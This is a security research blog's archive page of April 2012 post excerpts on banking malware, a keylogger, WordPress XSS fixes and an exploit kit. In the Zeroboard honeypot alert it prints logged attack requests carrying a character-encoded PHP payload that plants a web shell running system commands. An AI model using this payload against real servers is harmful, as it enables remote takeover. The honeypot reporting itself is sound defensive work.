Showing 11 results for: April 2012, Security Research

Brazilian Banking Malware: Pay Your Bill Slacker!

I recently got wind of an interesting little sample that I believe originated as part of a Brazilian phishing attack. The sample appears to still be quite unknown, as VirusTotal currently (VirusTotal Report) reports the sample as being detected...

Pwning a Spammer's Keylogger

Recently, while scrounging around our spam traps, I spotted this ordinary piece of malicious spam. It uses a very simple social engineering trick, speculating about Obama's sexual orientation and a link to a supposed picture to prove it. There was...

WordPress 3.3.2 Addresses Setup XSS Vulnerabilities

Back in January we released a security advisory for WordPress, which included four vulnerabilities in the installation scripts. After discussing these issues with the WordPress team, it was decided that the vulnerabilities were not going to be fixed immediately in...

Come and Join Us at InfoSecurity

This week we will be presenting and speaking at InfoSecurity, Europe's No.1 Information Security event (April 24th - 26th). We'll have our stand ready, marked D20, with materials and a small amphitheatre where I will be giving presentations on various...

[Honeypot Alert] Joomla com_s5clanroster Local File Inclusion Attacks

Our web honeypots picked up some increased scanning for the following Exploit-DB vulnerability:

[o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability
Software : com_s5clanroster
Vendor : http://www.shape5.com
Author : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf...

TrustKeeper Scan Engine Update

TrustKeeper Scan Engine is the scanner that powers Trustwave's Vulnerability Scanning Services, which help organizations around the world find vulnerabilities in their network environments. It also happens to be a key component of the TrustKeeper service that is used by...

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Our web honeypots recently identified attacks for CVE-2009-4834, which is a vulnerability within Zeroboard:

123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET...

A New Neighbor in Town: The Nuclear Pack v2.0 Exploit Kit

In the past few years, cybercriminals have been increasingly using exploit kits to spread malware. Today, several exploit kits, primarily Blackhole and Phoenix, dominate this market but occasionally we do find other rare ones that are being deployed. We would...